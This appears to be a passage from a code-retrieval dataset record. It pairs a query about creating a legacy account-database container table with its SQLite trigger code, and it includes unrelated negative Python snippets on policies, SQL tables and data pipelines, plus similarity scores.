None\n self.typeInfo['domainid'] = 'string'\n \"\"\"the LB rule ID\"\"\"\n self.lbruleid = None\n self.typeInfo['lbruleid'] = 'string'\n \"\"\"the id of the zone the HealthCheck policy belongs to\"\"\"\n self.zoneid = None\n self.typeInfo['zoneid'] = 'string'\n \"\"\"the list of healthcheckpolicies\"\"\"\n self.healthcheckpolicy = []", "def create_vpc_if_policy_group(self, name, aep_name):\n policy_group_mo = AccBndlGrp('uni/infra/funcprof/', name, lagT='node')\n self.commit(policy_group_mo)\n # if attachable entity profile does not exists, creates a new one\n class_query = ClassQuery('infraAttEntityP')\n class_query.propFilter = 'eq(infraAttEntityP.name, \"' + AEP_PREFIX + aep_name + '\")'\n pd_list = self.moDir.query(class_query)\n if len(pd_list) == 0:\n vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + aep_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + aep_name, str(vlan_pool_mo.dn))\n AttEntityP_mo = self.create_attachable_entity_profile(AEP_PREFIX + aep_name, str(DomP_mo.dn))\n else:\n AttEntityP_mo = pd_list[0]\n # Assign attached entity profile\n self.commit(\n RsAttEntP(policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))\n )\n # Assign interface policies. For non-defaults, check if is already created. If not, the system will create them\n IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')\n if not IfPolmo:\n IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')\n self.commit(IfPolmo)\n self.commit(\n RsCdpIfPol(policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)\n )\n self.commit(\n RsHIfPol(policy_group_mo.dn, tnFabricHIfPolName='default')\n )\n self.commit(\n RsL2IfPol(policy_group_mo.dn, tnL2IfPolName='default')\n )\n LagPolmo = self.moDir.lookupByDn('uni/infra/lacplagp-LACP')\n if not LagPolmo:\n LagPolmo = LagPol('uni/infra', 'LACP', mode='active')\n self.commit(LagPolmo)\n self.commit(\n RsLacpPol(policy_group_mo.dn, tnLacpLagPolName=LagPolmo.name)\n )\n self.commit(\n RsLldpIfPol(policy_group_mo.dn, tnLldpIfPolName='default')\n )\n self.commit(\n RsMcpIfPol(policy_group_mo.dn, tnMcpIfPolName='default')\n )\n self.commit(\n RsMonIfInfraPol(policy_group_mo.dn, tnMonInfraPolName='default')\n )\n self.commit(\n RsStormctrlIfPol(policy_group_mo.dn, tnStormctrlIfPolName='default')\n )\n self.commit(\n RsStpIfPol(policy_group_mo.dn, tnStpIfPolName='default')\n )\n return policy_group_mo", "def _store_blacklist_delta(self, executor):\n per_type_counts = {}\n with create_db_connection(self._config.db_config) as conn, conn.cursor() as cursor, CodeProfiler() as cp:\n tbl = sql.Identifier(self._blacklist_tblname)\n delta_tbl = sql.Identifier(self._blacklist_delta_tblname)\n # We set the end_run_id on any current row where we have a change in the delta table\n cursor.execute(sql.SQL(\"\"\"UPDATE {tbl} bl\n SET end_run_id = %s\n WHERE end_run_id IS NULL\n AND EXISTS (SELECT 1\n FROM {delta_tbl}\n WHERE imei_norm = bl.imei_norm)\n \"\"\").format(tbl=tbl, delta_tbl=delta_tbl),\n [self._run_id])\n per_type_counts['invalidated'] = cursor.rowcount\n # Now we should be able to just insert the delta list into the blacklist\n cursor.execute(sql.SQL(\"\"\"INSERT INTO {tbl}(imei_norm,\n virt_imei_shard,\n block_date,\n reasons,\n start_run_id,\n end_run_id,\n delta_reason)\n SELECT imei_norm,\n virt_imei_shard,\n block_date,\n reasons,\n start_run_id,\n end_run_id,\n delta_reason\n FROM {delta_tbl}\n \"\"\").format(tbl=tbl, delta_tbl=delta_tbl),\n [self._run_id])\n per_type_counts['new'] = cursor.rowcount\n self._analyze_helper(cursor, self._blacklist_tblname)\n\n 
return per_type_counts, cp.duration", "def __init__(self, policy):\n super().__init__(policy=policy, sess=policy.sess)", "def put_metric_policy(ContainerName=None, MetricPolicy=None):\n pass", "def assess_progress():\n\tconn = pymongo.Connection(MASTER_SERVER)\n\tdb = conn.SocialLearning\n\tdb.authenticate(MONGO_USER, MONGO_PASSWORD)\n\n\tcoll_names = db.collection_names()\n\n\tresult = {}\n\n\tfor m in modes:\n\t\tresult[m[0]] = [0]*MAX_DEMES\n\t\tfor subm in [c for c in coll_names if c.startswith('gp_ '+m[0])]:\n\t\t\tidx = int(subm[4 + len(m[0]):])\n\t\t\tif idx < MAX_DEMES:\n\t\t\t\tcoll = db[subm]\n\t\t\t\tresult[m[0]][idx] = coll.count()\n\n\treturn result", "def test_list_namespaced_policy(self):\n pass", "def __init__(__self__, *,\n backups_count: Optional[int] = None,\n policy_enabled: Optional[bool] = None,\n volume_name: Optional[str] = None):\n if backups_count is not None:\n pulumi.set(__self__, \"backups_count\", backups_count)\n if policy_enabled is not None:\n pulumi.set(__self__, \"policy_enabled\", policy_enabled)\n if volume_name is not None:\n pulumi.set(__self__, \"volume_name\", volume_name)", "def testPolicy( \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n self, \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n symbol=\"jpm\", \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n sd=dt.datetime(2008, 1, 1), \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n ed=dt.datetime(2009, 12, 31), \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n sv=10000, \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n ): \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n \t\t \t \t\t \t \t\t\t \t\t \t\t\t \t \t \t\t \t\t \t\n dates = pd.date_range(sd,ed)\n df_prices = ind.get_price(symbol, dates)\n\n daily_rets = (df_prices / df_prices.shift(1)) - 1\n daily_rets = daily_rets[1:]\n\n\n sd_older = sd - dt.timedelta(days=365)\n dates_older = pd.date_range(sd_older,ed)\n df_prices_older = ind.get_price(symbol, dates_older)\n sd_key = df_prices.index[0]\n sd_index = df_prices_older.index.get_loc(sd_key)\n\n\n df_holdings = df_prices.copy()\n df_holdings['Holdings'] = np.nan\n del df_holdings[symbol]\n # print(df_holdings)\n\n cum_ret_prev = 0\n iters = 0\n\n\n num_bins = len(self.bins)\n\n _,_,ind1 = ind.get_BB(df_prices_older, self.lookback)\n ind2 = ind.get_CCI(df_prices_older, self.lookback)\n _,_,ind3 = ind.get_SMA_Cross(self.lookback, 100, df_prices_older)\n ind4 = ind.get_momentum(df_prices_older, self.lookback)\n _,_,ind5 = ind.get_MACD(df_prices_older)\n BB = ind1.iloc[sd_index:].values\n CCI = ind2.iloc[sd_index:].values\n SMA_Cross = ind3.iloc[sd_index:].values\n Momentum = ind4.iloc[sd_index:].values\n MACD = ind5.iloc[sd_index:].values\n _,self.x0bins = pd.qcut(BB[:,0], num_bins,labels=False,retbins=True)\n _,self.x1bins = pd.qcut(CCI[:,0],num_bins,labels=False,retbins=True)\n _,self.x2bins = pd.qcut(SMA_Cross[:,0],num_bins,labels=False,retbins=True)\n _,self.x3bins = pd.qcut(Momentum[:,0],num_bins,labels=False,retbins=True)\n _,self.x4bins = pd.qcut(MACD[:,0],num_bins,labels=False,retbins=True)\n x_0 = np.digitize(BB[:,0], self.x0bins[1:-1])\n x_1 = np.digitize(CCI[:,0], self.x1bins[1:-1])\n x_2 = np.digitize(SMA_Cross[:,0], self.x2bins[1:-1])\n x_3 = np.digitize(Momentum[:,0], self.x3bins[1:-1])\n x_4 = np.digitize(MACD[:,0], self.x4bins[1:-1])\n state = x_0 + x_3*10 + x_4*100\n\n\n\n\n\n self.learner.rar = 0\n\n action = self.learner.querysetstate(state[0])\n\n daily_return = daily_rets.iloc[0][symbol]\n df_holdings.iloc[0]['Holdings'] = 
0\n\n\n for day_idx in range(1,daily_rets.shape[0]):\n\n # implement action\n cur_price = df_prices.iloc[day_idx-1][symbol]\n next_price = df_prices.iloc[day_idx][symbol]\n action = self.learner.querysetstate(state[day_idx])\n df_holdings.iloc[day_idx]['Holdings'],_ = self.take_action(df_holdings.iloc[day_idx-1]['Holdings'], action, cur_price, next_price)\n\n\n df_holdings.iloc[-1]['Holdings'] = 0\n df_trades = df_holdings.diff()\n df_trades['Trades'] = df_trades['Holdings']\n del df_trades['Holdings']\n df_trades.iloc[0]['Trades'] = 0\n return df_trades", "def create_table(opts, stats):\n print(\"--------------------------------------\")\n print(\"Creating table %s\" % (opts.table_name,))\n print(\"--------------------------------------\")\n print(timestamp())\n create_table_ddl = \"CREATE TABLE %s (\" % (opts.table_name,)\n num_bigint_cols = opts.columns - opts.num_string_columns\n assert(num_bigint_cols > 0)\n for i in range(opts.columns):\n coltype = 'STRING'\n if i < num_bigint_cols: coltype = 'BIGINT'\n if i > 0: create_table_ddl += ', '\n create_table_ddl += \"f%d %s\" % (i, coltype)\n if i == 0: create_table_ddl += ' PRIMARY KEY'\n create_table_ddl += \") PARTITION BY HASH(f0) PARTITIONS %d STORED AS KUDU \" % \\\n (opts.partitions, )\n create_table_ddl += \"TBLPROPERTIES ('kudu.num_tablet_replicas' = '%d')\" % \\\n (opts.replication_factor, )\n\n cmd = 'echo \"%s\" | impala-shell -i %s -f -' % (create_table_ddl, opts.impalad_address)\n run_command(opts, cmd)", "def new_capacity_rule(mod, g, p):\n return 0", "def test_get_hyperflex_cluster_storage_policy_by_moid(self):\n pass", "def __init__(self, policy: TypePolicy, byte_offset: int, byte_size: int, bin: TypeBinName): \n self._children= (\n byte_offset,\n byte_size,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def get_database_state(client, db_config):\n measurements = [\n m['name'] for m\n in client.query('SHOW MEASUREMENTS').get_points()\n ]\n\n queries = list(client.query('SHOW CONTINUOUS QUERIES').get_points())\n\n policies = list(client.query('SHOW RETENTION POLICIES').get_points())\n\n policy_info = {\n tpl.policy_name(policy): dict(\n create=tpl.policy_query(policy, db_config['database']),\n update=tpl.policy_update_query(policy, db_config['database']),\n **policy\n )\n for policy in db_config['desired_policies']\n }\n\n policy_info[\"input\"] = dict(\n create=tpl.policy_query(\n db_config['default_policy'],\n db_config['database']\n ) + \" DEFAULT\",\n update=tpl.policy_update_query(\n db_config['default_policy'],\n db_config['database']\n ) + \" DEFAULT\",\n **db_config['default_policy']\n )\n\n query_info = {\n tpl.continuous_query_name(policy, measurement): dict(\n query=tpl.continuous_query_create(\n policy,\n measurement,\n db_config['database']\n ),\n measurement=measurement,\n **policy\n )\n for policy in db_config['desired_policies']\n for measurement in measurements\n }\n\n existing_policies = {p['name']: p for p in policies}\n\n existing_queries = {q[\"name\"]: q[\"query\"] for q in queries}\n\n return existing_policies, existing_queries, policy_info, query_info", "def __init__(self, database='/tmp/blingalytics_cache'):\n self.database = database\n self._create_metadata_table()", "def __init__(self, policy: TypePolicy, bit_offset: int, bit_size: int, value: int, action: int, bin: TypeBinName): \n self._children= (\n 
bit_offset,\n bit_size,\n value,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: action} if action is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def __init__(self, policy: TypePolicy, bit_offset: int, bit_size: int, value: int, action: int, bin: TypeBinName): \n self._children= (\n bit_offset,\n bit_size,\n value,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: action} if action is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def test_new_count(self):\n self.assertEqual(2, self.alice_storage.new_count)\n self.assertEqual(3, self.bob_storage.new_count)\n self.assertEqual(0, self.carol_storage.new_count)\n self.assertEqual(0, self.anonymous_storage.new_count)", "def test_create_policy_for_all_namespaces(self):\n pass", "def load_fact_traffic_violations_count_agg(cur,code):\n cur.execute(code)", "def scalar_bucket_counts(**kwargs):\n attributes_list = [\"ping_type\", \"os\", \"app_version\", \"app_build_id\", \"channel\"]\n fixed_attributes = [\"app_version\", \"channel\"]\n cubed_attributes = [x for x in attributes_list if x not in fixed_attributes]\n return dict(\n attributes=\",\".join(attributes_list),\n cubed_attributes=cubed_attributes,\n attribute_combinations=compute_datacube_groupings(cubed_attributes),\n scalar_metric_types=\"\"\"\n \"counter\",\n \"quantity\",\n \"labeled_counter\",\n \"timespan\"\n \"\"\",\n boolean_metric_types=\"\"\"\n \"boolean\"\n \"\"\",\n aggregate_attributes=\"\"\"\n metric,\n metric_type,\n key\n \"\"\",\n aggregate_attributes_type=\"\"\"\n metric STRING,\n metric_type STRING,\n key STRING\n \"\"\",\n **{\n # re-use variables from previous query\n key: clients_scalar_aggregates()[key]\n for key in [\"user_data_attributes\", \"user_data_type\"]\n },\n **kwargs,\n )", "def generate_amortization_table(self):\n payment = self.payment\n self.table = {\"index\":[index for index in self.index],\\\n \"payment\": [payment for n in self.index],\n \"interest\":[0],\n \"amortization\":[0],\n \"balance\":[self.principal]}\n for i in self.table[\"index\"][1:]:\n interest = self.table[\"balance\"][i-1] * self.interest\n self.table[\"interest\"].append(round(interest,0))\n amortization = payment - interest\n self.table[\"amortization\"].append(round(amortization,0))\n prior_balance = self.table[\"balance\"][i-1] \n ending_balance = prior_balance - amortization\n self.table[\"balance\"].append(round(ending_balance,0))\n\n return self.table", "def __create_recentconn_table(self):\r\n QtSql.QSqlQuery('''CREATE TABLE IF NOT EXISTS recentconn\r\n (host varchar(255),\r\n port int,\r\n passphrase varchar(255),\r\n UNIQUE (host, port) ON CONFLICT REPLACE)''')", "def _update_suspicion_1(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += multiplier", "def setUpClass(cls):\n super(GetScalingPolicy, cls).setUpClass(change_percent=100)\n cls.get_policy_response = cls.autoscale_client.get_policy_details(\n cls.group.id, cls.policy['id'])\n cls.get_policy = cls.get_policy_response.entity", "def __init__(self, aggregation_depth, 
include_bytes=True):\n\n self._prev_stats = {}\n self._aggregation_depth = aggregation_depth\n self._include_bytes = include_bytes\n\n self.init_cur_stats()", "def GenerateVersion(self):\n pol_obj = self.env['account.analytic.account']\n hist_obj = self.env['account.analytic.account']\n inv_obj = self.env['account.invoice']\n values = self.GeneratePolicy()\n # logger.info('\\n === values = %s' % values)\n policies = values.get('policy', [])\n res = []\n i = 0\n for policy in pol_obj.browse(policies):\n i += 1\n logger.info('version %s -> %s (%s / %s)' % (policy.name, policy.id, i, len(policies)))\n # search invoice\n inv_ids = inv_obj.search([('pol_numpol', '=', policy.name), ('id','in', values.get('invoice'))], order='prm_datedeb')\n # logger.info('=== inv_ids = %s' % inv_ids.mapped('prm_datedeb'))\n inv_len = len(inv_ids)\n c = 0\n for inv_id in inv_ids:\n c += 1\n # logger.info('inv_len = %s ?= %s c' % (inv_len,c))\n hist_buf = {\n 'type': 'contract',\n 'is_insurance': True,\n 'partner_id': policy.partner_id.id,\n 'property_account_position': policy.property_account_position.id,\n 'insured_id': policy.insured_id.id,\n 'manager_id': policy.manager_id.id,\n 'branch_id': policy.branch_id.id,\n 'ins_product_id': policy.ins_product_id.id,\n 'fraction_id': policy.fraction_id.id or False,\n #'name': policy.name + '_' + str(c).zfill(4) + 'AA',\n 'name': policy.name + '_' + str(policy.next_sequence).zfill(4) + 'AA',\n 'parent_id': policy.id,\n 'date_start': inv_id.prm_datedeb,\n 'date': inv_id.prm_datefin,\n 'agency_id': inv_id.journal_id.agency_id.id or False,\n 'invoice_id': inv_id.id,\n 'stage_id': self.env.ref('insurance_management.avenant').id\n }\n if c == inv_len:\n hist_buf['is_last_situation'] = True\n hist_ids = hist_obj.search([('name','=', hist_buf.get('name'))])\n if not hist_ids:\n # logger.info('===> create history')\n res.append(hist_obj.create(hist_buf).id)\n next_sequence = policy.next_sequence + 1\n policy.write({'next_sequence': next_sequence})\n else:\n hist_ids.update(hist_buf)\n res += hist_ids.ids\n return res", "def __init__(__self__, *,\n datasource_types: Sequence[str],\n object_type: str,\n policy_rules: Sequence[Any]):\n pulumi.set(__self__, \"datasource_types\", datasource_types)\n pulumi.set(__self__, \"object_type\", 'BackupPolicy')\n pulumi.set(__self__, \"policy_rules\", policy_rules)", "def derive_newrelic_stats(self):\n self.logger.debug(\"Collecting stats for newrelic\")\n self.derive_newrelic_volume()\n self.derive_newrelic_throughput()\n self.derive_newrelic_innodb()\n self.derive_newrelic_qcache()\n self.derive_newrelic_slaves()" ]
[ "0.6394596", "0.6312397", "0.52926415", "0.5226492", "0.521135", "0.5126524", "0.50752866", "0.50496316", "0.49747297", "0.49588305", "0.4934026", "0.48855892", "0.48768532", "0.4860666", "0.48166457", "0.4806398", "0.4796792", "0.4787185", "0.477994", "0.47572404", "0.47571683", "0.4751286", "0.47465718", "0.4733808", "0.47229534", "0.46898544", "0.46874636", "0.46838748", "0.46799147", "0.4676652", "0.4661229", "0.46586624", "0.46580857", "0.46499464", "0.46492592", "0.4649131", "0.46423596", "0.46319106", "0.4615684", "0.46153516", "0.46075523", "0.45971617", "0.45925173", "0.45915657", "0.45826656", "0.4581899", "0.45783204", "0.45551354", "0.45473814", "0.453016", "0.4504878", "0.45013106", "0.4499554", "0.4494766", "0.44927314", "0.44893572", "0.4485929", "0.44715333", "0.44663805", "0.44656515", "0.44587994", "0.4451454", "0.44476047", "0.4446904", "0.44451365", "0.44393563", "0.4437822", "0.4435276", "0.44239813", "0.44179446", "0.44155857", "0.4414742", "0.44133118", "0.44085887", "0.440732", "0.44045362", "0.4404439", "0.44030583", "0.44018236", "0.44004104", "0.4399153", "0.4392589", "0.43894574", "0.43844557", "0.43814093", "0.43752313", "0.4372328", "0.4372328", "0.43656665", "0.43599385", "0.43576676", "0.435511", "0.4351081", "0.43441647", "0.43409708", "0.43406448", "0.43376634", "0.43370932", "0.43337983", "0.43327838" ]
0.8145411
0
Copied from AccountBroker before the container_count column was added (using the old stat trigger script). Create container table which is specific to the account DB.
def pre_track_containers_create_container_table(self, conn): # revert to old trigger script to support one of the tests OLD_POLICY_STAT_TRIGGER_SCRIPT = """ CREATE TRIGGER container_insert_ps AFTER INSERT ON container BEGIN INSERT OR IGNORE INTO policy_stat (storage_policy_index, object_count, bytes_used) VALUES (new.storage_policy_index, 0, 0); UPDATE policy_stat SET object_count = object_count + new.object_count, bytes_used = bytes_used + new.bytes_used WHERE storage_policy_index = new.storage_policy_index; END; CREATE TRIGGER container_delete_ps AFTER DELETE ON container BEGIN UPDATE policy_stat SET object_count = object_count - old.object_count, bytes_used = bytes_used - old.bytes_used WHERE storage_policy_index = old.storage_policy_index; END; """ conn.executescript(""" CREATE TABLE container ( ROWID INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, put_timestamp TEXT, delete_timestamp TEXT, object_count INTEGER, bytes_used INTEGER, deleted INTEGER DEFAULT 0, storage_policy_index INTEGER DEFAULT 0 ); CREATE INDEX ix_container_deleted_name ON container (deleted, name); CREATE TRIGGER container_insert AFTER INSERT ON container BEGIN UPDATE account_stat SET container_count = container_count + (1 - new.deleted), object_count = object_count + new.object_count, bytes_used = bytes_used + new.bytes_used, hash = chexor(hash, new.name, new.put_timestamp || '-' || new.delete_timestamp || '-' || new.object_count || '-' || new.bytes_used); END; CREATE TRIGGER container_update BEFORE UPDATE ON container BEGIN SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT'); END; CREATE TRIGGER container_delete AFTER DELETE ON container BEGIN UPDATE account_stat SET container_count = container_count - (1 - old.deleted), object_count = object_count - old.object_count, bytes_used = bytes_used - old.bytes_used, hash = chexor(hash, old.name, old.put_timestamp || '-' || old.delete_timestamp || '-' || old.object_count || '-' || old.bytes_used); END; """ + OLD_POLICY_STAT_TRIGGER_SCRIPT)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prespi_create_container_table(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE container (\n ROWID INTEGER PRIMARY KEY AUTOINCREMENT,\n name TEXT,\n put_timestamp TEXT,\n delete_timestamp TEXT,\n object_count INTEGER,\n bytes_used INTEGER,\n deleted INTEGER DEFAULT 0\n );\n\n CREATE INDEX ix_container_deleted_name ON\n container (deleted, name);\n\n CREATE TRIGGER container_insert AFTER INSERT ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count + (1 - new.deleted),\n object_count = object_count + new.object_count,\n bytes_used = bytes_used + new.bytes_used,\n hash = chexor(hash, new.name,\n new.put_timestamp || '-' ||\n new.delete_timestamp || '-' ||\n new.object_count || '-' || new.bytes_used);\n END;\n\n CREATE TRIGGER container_update BEFORE UPDATE ON container\n BEGIN\n SELECT RAISE(FAIL, 'UPDATE not allowed; DELETE and INSERT');\n END;\n\n\n CREATE TRIGGER container_delete AFTER DELETE ON container\n BEGIN\n UPDATE account_stat\n SET container_count = container_count - (1 - old.deleted),\n object_count = object_count - old.object_count,\n bytes_used = bytes_used - old.bytes_used,\n hash = chexor(hash, old.name,\n old.put_timestamp || '-' ||\n old.delete_timestamp || '-' ||\n old.object_count || '-' || old.bytes_used);\n END;\n \"\"\")", "def pre_track_containers_create_policy_stat(self, conn):\n conn.executescript(\"\"\"\n CREATE TABLE policy_stat (\n storage_policy_index INTEGER PRIMARY KEY,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0\n );\n INSERT OR IGNORE INTO policy_stat (\n storage_policy_index, object_count, bytes_used\n )\n SELECT 0, object_count, bytes_used\n FROM account_stat\n WHERE container_count > 0;\n \"\"\")", "def create_dataBase(conn, create_cmd):\n if conn:\n cursor = conn.cursor()\n cursor.execute(create_cmd)\n conn.commit()\n #print '[sql management] Table Created...'", "def create_table(self):\n pass", "def create_base_table(self, table_name):\n print('new')\n # Create table at first.\n select_stm = self.construct_base_table()\n exec_query('DROP TABLE IF EXISTS %s;' % table_name) \n sql = \"\"\"\n CREATE TABLE %s AS\n %s\n \"\"\" % (table_name, select_stm)\n exec_query(sql)", "def imp_create_tables():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n # Drop the tables (uncomment if necessary)\n #drop_tables(cur, conn)\n\n # Create the tables\n create_tables(cur, conn)\n\n conn.close()", "def premetadata_create_account_stat_table(self, conn, put_timestamp):\n conn.executescript('''\n CREATE TABLE account_stat (\n account TEXT,\n created_at TEXT,\n put_timestamp TEXT DEFAULT '0',\n delete_timestamp TEXT DEFAULT '0',\n container_count INTEGER,\n object_count INTEGER DEFAULT 0,\n bytes_used INTEGER DEFAULT 0,\n hash TEXT default '00000000000000000000000000000000',\n id TEXT,\n status TEXT DEFAULT '',\n status_changed_at TEXT DEFAULT '0'\n );\n\n INSERT INTO account_stat (container_count) VALUES (0);\n ''')\n\n conn.execute('''\n UPDATE account_stat SET account = ?, created_at = ?, id = ?,\n put_timestamp = ?\n ''', (self.account, Timestamp.now().internal, str(uuid4()),\n put_timestamp))", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def _create_intermediate_new_tables_structure(self, conn):\n table_names 
= []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n imei_norm_with_check_digit TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_new_part_tblname,\n is_unlogged=True)\n\n tblname = self._blocking_conditions_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n cond_name TEXT NOT NULL,\n reason TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._mnc_mcc_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n mcc_mnc_pattern TEXT NOT NULL,\n operator_id TEXT NOT NULL\n )\"\"\")\n .format(sql.Identifier(tblname)))\n table_names.append(tblname)\n\n tblname = self._notifications_imei_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_triplets_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n is_valid BOOLEAN,\n amnesty_granted BOOLEAN,\n imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n fallback_operators TEXT[]\n ) PARTITION BY RANGE (virt_imei_shard)\"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._pairings_imei_imsi_new_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n is_valid BOOLEAN,\n 
imei_norm_with_check_digit TEXT,\n home_operator TEXT,\n is_blacklisted BOOLEAN\n ) PARTITION BY RANGE (virt_imei_shard) \"\"\")\n .format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True, fillfactor=45)\n table_names.append(tblname)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def __set_container_info(self):\n self.container = \"{}_{}_1\".format(self.build, self.service.lower())\n self.mysql_container = \"{}_{}-mysql_1\".format(self.build, self.service.lower())", "def create_and_insert_d(connection: DBConnection) -> None:\n print(\"\\n[-] creating table d\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE d AS\n SELECT COUNT(DISTINCT did) AS size FROM tfs\n \"\"\")\n print(\"\\r[+] creating table d\")", "def create_table(self):\n from deployflag.models.metadata import (\n GridSearchParameter,\n ModelFramework,\n ModelPerformanceMetadata,\n )\n\n with self.connection:\n self.connection.create_tables(\n [ModelPerformanceMetadata, GridSearchParameter, ModelFramework],\n safe=True,\n )", "def _create_table(self) :\n\n cur = self.con.cursor()\n delete_sql = 'DROP TABLE IF EXISTS \"%s\"' % self.name\n cur.execute(delete_sql)\n\n col_sql = ','.join(['\"%s\" %s' % (self.cols[i], self.types[i])\n for i in range(len(self.cols))])\n create_sql = 'CREATE TABLE \"%s\" ( %s );' % (self.name, col_sql)\n cur.execute(create_sql)", "def create_and_insert_dls(connection: DBConnection) -> None:\n print(\"\\n[-] creating table dls\", end=\"\")\n connection.execute(\"\"\"\n CREATE TABLE dls AS\n SELECT did, SUM(tf) AS len FROM tfs GROUP BY did\n \"\"\")\n print(\"\\r[+] creating table dls\")", "def setup_table(self):\n self.interface.start_transaction()\n self.interface.drop_table(_history_table)\n 